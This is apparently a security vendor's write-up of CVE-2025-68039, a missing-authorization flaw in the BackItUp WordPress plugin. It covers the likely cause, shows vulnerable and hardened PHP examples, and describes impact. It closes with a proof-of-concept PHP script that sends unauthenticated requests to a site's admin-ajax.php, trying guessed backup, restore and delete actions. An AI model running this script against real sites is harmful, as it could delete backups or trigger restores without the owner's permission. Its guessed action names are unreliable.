Atomic Edge analysis of CVE-2025-68039 (metadata-based):
This vulnerability is a Missing Authorization flaw in the BackItUp WordPress plugin, affecting versions up to and including 2.1.0. The flaw allows unauthenticated attackers to trigger a privileged backend function, leading to unauthorized actions.
Atomic Edge research identifies the root cause as a missing capability check on a WordPress hook handler. The CWE-862 classification confirms the plugin fails to verify a user’s permission level before executing a function. Without access to the source code, this conclusion is inferred from the CWE and the standard WordPress plugin pattern where AJAX or admin-post endpoints register callback functions. The vulnerability likely involves a function registered via `add_action` for `wp_ajax_nopriv_`, `admin_post_nopriv_`, or a REST API route without proper `permission_callback`.
Exploitation requires sending a crafted HTTP request to the vulnerable endpoint. Based on WordPress plugin conventions and the plugin slug 'wp-backitup', the most probable attack vector is the WordPress AJAX handler. An attacker would send a POST request to `/wp-admin/admin-ajax.php` with an `action` parameter containing a value like `wp_backitup_` or `backitup_` followed by a specific action name. The exact action name is unknown, but common plugin actions include 'run_backup', 'restore', or 'delete_log'. The payload would contain any parameters the vulnerable function expects.
Remediation requires adding a proper authorization check. The patched version must implement a capability check, such as `current_user_can('manage_options')` or a plugin-specific capability, within the callback function. For REST API endpoints, a valid `permission_callback` function must be defined. For AJAX handlers, the function should be registered only under the authenticated `wp_ajax_` hook, not the `wp_ajax_nopriv_` hook, unless the action is intentionally public.
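The registration pattern described in the root-cause and remediation paragraphs above, as an added example that is not BackItUp's code and is not taken from the vendor patch. The hook, function and nonce names (`backitup_demo_run_backup`, `wp_backitup_demo_nonce`, the `backitup-demo/v1` REST namespace) are hypothetical; only the WordPress API calls (`add_action`, `current_user_can`, `check_ajax_referer`, `register_rest_route`) are real. It shows the CWE-862 shape beside the hardened form for both an AJAX handler and a REST route:

```php
<?php
// Added example (not the plugin's code). Names below are hypothetical.

// --- Vulnerable pattern: privileged callback reachable without login ---
// Registering the callback on the wp_ajax_nopriv_ hook exposes it to any
// visitor, and the callback itself never checks a capability or a nonce.
function backitup_demo_run_backup_vulnerable() {
    backitup_demo_do_backup(); // privileged work
    wp_send_json_success( array( 'message' => 'backup started' ) );
}
add_action( 'wp_ajax_backitup_demo_run_backup', 'backitup_demo_run_backup_vulnerable' );
add_action( 'wp_ajax_nopriv_backitup_demo_run_backup', 'backitup_demo_run_backup_vulnerable' );

// --- Hardened pattern ---
function backitup_demo_run_backup_hardened() {
    // 1. Authorization: only users with manage_options may run a backup.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( array( 'message' => 'forbidden' ), 403 );
    }
    // 2. CSRF protection: the admin page must have emitted
    //    wp_create_nonce( 'wp_backitup_demo_nonce' ) as the 'security' field.
    //    check_ajax_referer() terminates the request with 403 on mismatch.
    check_ajax_referer( 'wp_backitup_demo_nonce', 'security' );
    backitup_demo_do_backup();
    wp_send_json_success( array( 'message' => 'backup started' ) );
}
// Registered only for authenticated users; no wp_ajax_nopriv_ hook at all.
add_action( 'wp_ajax_backitup_demo_run_backup', 'backitup_demo_run_backup_hardened' );

// --- REST route with a real permission_callback ---
add_action( 'rest_api_init', function () {
    register_rest_route( 'backitup-demo/v1', '/backup', array(
        'methods'             => 'POST',
        'callback'            => function ( WP_REST_Request $request ) {
            backitup_demo_do_backup();
            return new WP_REST_Response( array( 'status' => 'started' ), 202 );
        },
        // Using '__return_true' here would reproduce the missing-authorization bug;
        // the permission check must evaluate the caller's capability.
        'permission_callback' => function () {
            return current_user_can( 'manage_options' );
        },
    ) );
} );

function backitup_demo_do_backup() {
    // Placeholder for the plugin's real backup routine (hypothetical).
}
```

When reviewing a plugin for this class of bug, grep for every `wp_ajax_nopriv_` and `admin_post_nopriv_` registration and every `register_rest_route` call, and confirm that each callback reachable that way either performs no privileged work or checks a capability itself; a `permission_callback` of `__return_true` on a state-changing route is the REST equivalent of the `nopriv` hook.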
The direct impact is an unauthorized action performed by an unauthenticated attacker. The CVSS vector indicates a low impact on integrity (I:L) with no effect on confidentiality or availability. The specific action is not detailed, but in a backup plugin context, potential impacts include triggering resource-intensive backup or restore operations, deleting backup files or logs, or modifying plugin settings. This could lead to service disruption, data loss, or unauthorized configuration changes.
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2025-68039 - BackItUp <= 2.1.0 - Missing Authorization

/**
 * Proof of Concept for CVE-2025-68039.
 * This script attempts to trigger an unauthorized action in the BackItUp plugin.
 * The exact AJAX action name is unknown and must be inferred or discovered.
 * Common candidates are tested based on plugin functionality.
 */
$target_url = 'http://target-site.com/wp-admin/admin-ajax.php'; // CHANGE THIS

// Common action prefixes and suffixes for the 'wp-backitup' plugin
$action_candidates = [
    'wp_backitup_run_backup',
    'backitup_run_backup',
    'wp_backitup_restore',
    'backitup_restore',
    'wp_backitup_delete',
    'backitup_delete',
    'wp_backitup_cleanup',
    'backitup_cleanup',
    'wp_backitup_get_log',
    'backitup_get_log',
];

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_POST, true);

foreach ($action_candidates as $action) {
    // Requests are sent without any cookie, i.e. as an unauthenticated visitor.
    $post_data = ['action' => $action];
    // Some actions may require additional parameters; a minimal payload is used.
    curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);
    $response = curl_exec($ch);
    if ($response === false) {
        echo "[*] Testing action: {$action}\n";
        echo "    cURL error: " . curl_error($ch) . "\n\n";
        continue;
    }
    $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    echo "[*] Testing action: {$action}\n";
    echo "    HTTP Code: {$http_code}\n";
    // A successful trigger may return a 200 with plugin-specific JSON or message.
    // A failure may return 0, 403, or a WordPress error.
    if ($http_code == 200 && !empty($response)) {
        echo "    Response (first 200 chars): " . substr($response, 0, 200) . "\n";
        if (strpos($response, 'success') !== false || strpos($response, 'backup') !== false) {
            echo "[!] POTENTIAL HIT for action: {$action}\n";
        }
    }
    echo "\n";
}
curl_close($ch);
?>